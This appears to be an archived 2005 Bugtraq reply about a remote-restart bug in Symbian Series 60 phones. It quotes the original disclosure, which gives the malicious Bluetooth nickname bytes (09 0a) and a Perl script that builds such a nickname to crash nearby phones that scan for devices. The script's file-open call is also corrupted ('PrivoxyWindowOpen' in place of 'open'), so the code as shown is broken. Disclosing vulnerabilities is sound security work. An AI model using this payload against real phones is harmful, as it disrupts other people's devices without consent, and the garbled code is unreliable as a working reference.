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Re: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart

Hello Qnix@xxxxxxxxxxx!

Not only Nokia Bluetooth devices are affected.
It seems that all Series60 phones have this bug, including all firmware versions
of Siemens SX1.

====[ End of message ]====

    Best Regards,
    Alex Renn Jr.

===[ Original Message ]===

From: Qnix@xxxxxxxxxxx <Qnix@xxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart
Date: 27.06.2005 11:55

> When i was playing with my bluetooth device,
> i found that if you add in your nickname " 09 0a " in hex, it will cause that
> every one who search for available bluetooth devices and find your nickname 
> his
> nokia phone will restart.
> you should add a nicname like that,

> [something][09 0a in hex][just add anything here]

> you should add anything before 09 0a because the nokia phones think that its
> a space at the end, and it will auto deleted so you should add any thing 
> before
> 090a .

> nokia-bt-cx.pl
> -------------start---------------
> #!/usr/bin/perl -w

> my $btnick;
> my $bth;
> my  $bts;
> my $file;
> $bth = "        .";
> print "\n*******************************************************\n";
> print "**      BY QNIX | Q-nix[@]bsdmail[dot]org            **\n";
> print "*******************************************************\n";
> print " \n write your nickname : ";
> $btnick = <STDIN>;
> chomp($btnick);
> print " \n OUTPUT : ";
> $file = <STDIN>;
> chomp($file);
> PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";
> $bts = "$btnick$bth";
> print BLUEN ("$bts");
> close(BLUEN);
> print "\n Done !! , send the output to your nokia and copy the file to the 
> bluetooth nickname space . \n\n";
> -------------end-----------------

> may be someone got more information about that bug or any thing else.
> and maybe someone can develop that problem.

===[ End of Original Message ]===